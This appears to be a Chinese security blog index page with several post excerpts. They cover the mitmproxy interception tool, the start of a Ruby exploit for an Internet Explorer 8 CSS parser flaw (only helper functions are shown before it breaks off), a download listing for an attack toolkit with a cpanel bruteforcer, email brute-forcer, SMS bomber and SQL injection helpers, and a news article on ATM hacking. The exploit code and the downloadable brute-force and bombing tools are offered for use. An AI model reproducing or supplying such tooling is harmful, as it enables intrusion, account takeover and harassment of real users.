mitmproxy

QQ20130628-2

mitmproxy是一款支持SSL的HTTP代理,它可以用于调试HTTP通信,发起中间人攻击等。mitmproxy提供了一个控制台接口用于动态拦 截和编辑HTTP数据包。mitmdump是mitmproxy的命令行版本,功能与其相同。

link:http://www.mitmproxy.org/
mitmproxy的主要特点:

Intercept and modify HTTP traffic on the fly

Save HTTP conversations for later replay and analysis

Replay both HTTP clients and servers

Make scripted changes to HTTP traffic using Python

SSL interception certs generated on the fly

Continue Reading

Internet Explorer 8 CSS Parser Exploit Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env ruby 
 
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
 
require 'socket'
 
def http_send(sock, data, opts={}) 
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} 
    opts = defaults.merge(opts) 
 
    code = opts[:code] 
    message = opts[:message] 
    type = opts[:type] 
 
    to_send = "HTTP/1.1 #{code} #{message}\r\n" + 
              "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" + 
              "Cache-Control: no-cache\r\n" + 
              "Content-Type: #{type}\r\n" + 
              "Pragma: no-cache\r\n" + 
              "Content-Length: #{data.length}\r\n\r\n" + 
              "#{data}"
    puts "[+] Sending:"
    to_send.split("\n").each do |line| 
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
 
def sock_read(sock, out_str, timeout=5) 
    begin
        if Kernel.select([sock],[],[],timeout) 
            out_str.replace(sock.recv(1024)) 
            puts "[+] Received:"
            out_str.split("\n").each do |line| 
                puts "    #{line}"
            end
        else
            sock.close 
            return false
        end
    rescue Exception => ex 
        return false
    end
end
 
def to_uni(str) 
    res = ""
    str.each_byte do |b| 
        res < < "\x00#{b.chr}"
    end
    res 
end
Continue Reading

Reiluke tools(include SQlIhelper 2.7)

File List:

2009-02-12  09:33    <DIR>          admin finder
2009-02-16  10:25    <DIR>          blind Sqli
2009-02-12  10:03    <DIR>          cpanel bruteforcer
2009-02-12  09:53    <DIR>          duplicate remover
2009-02-12  09:52    <DIR>          email brute
2009-02-16  10:25    <DIR>          email checker
2009-02-12  10:01    <DIR>          exploit scanner
2009-02-12  10:04    <DIR>          php rapidshare checker
2009-02-12  09:57    <DIR>          rapidshare checker
2009-02-12  09:36    <DIR>          sms bomber
2009-02-12  09:54    <DIR>          sqli column counter
2009-09-01  10:50    <DIR>          sqliHelper 2.7
2009-02-12  10:02    <DIR>          steam checker

Download link1~~ Download link2~~(offical link)

Continue Reading

黑掉ATM的机会:编写恶意程序黑掉后台系统

20091004093614f933f《新知客》9月刊报道 要黑银行的ATM有两条路:编个恶意程序,直接骗过柜员机上那个漏洞百出的Windows系统;或者先黑银行的后台系统,盗取客户信息之后再大模大样到ATM取钱。这两条路,现在都有得走。

网络安全研究人员杰克(Barnaby Jack)在美国拉斯维加斯的黑帽安全会议(Black Hat)上原本有一个精彩的演讲,他准备演示如何入侵ATM(自动柜员机),以证明多种不同型号的ATM存在安全隐患。“我一直很喜欢《终结者2》的一个场景,约翰·康纳走到一台自动柜员机前,将Atari接入读卡器并从机器中取出大量现金。我认为已经找到了这样做的关键。”

杰克为自己的演讲取名为“自动柜员机让你发财”,但他最后并没有“美梦成真”,因为这次演讲最后被取消了。作为计算机网络公司瞻博(Juniper)的雇员,杰克被公司告知停止这次演讲,理由是ATM生产厂商对公司施压。

美国密歇根大学研究网络安全的哈德曼(J. Alex Halderman)教授在接受记者采访时对瞻博的这一行为表示理解,“ATM生产厂商可以以泄漏秘密为由将瞻博告上法庭,因为杰克善意的演讲可能会被人利用。在找到修补漏洞的办法之前,ATM不能冒这么大的风险。”美国黑客曾经入侵花旗银行的ATM网络,让花旗蒙受至少200万美元的损失,而这仅仅是ATM漏洞所致巨额损失中的九牛一毛。

ATM的“自动”机制

1967年6月27日,世界上第一台自动取款机在伦敦附近的巴克莱银行分行亮相。时至今日,据汇丰银行估计,95%的取款是通过ATM机而不是柜台出纳办理的。数亿人习惯了在墙上的“洞”里存钱、取钱。

“洞”的核心秘密在看不见的地方。

Continue Reading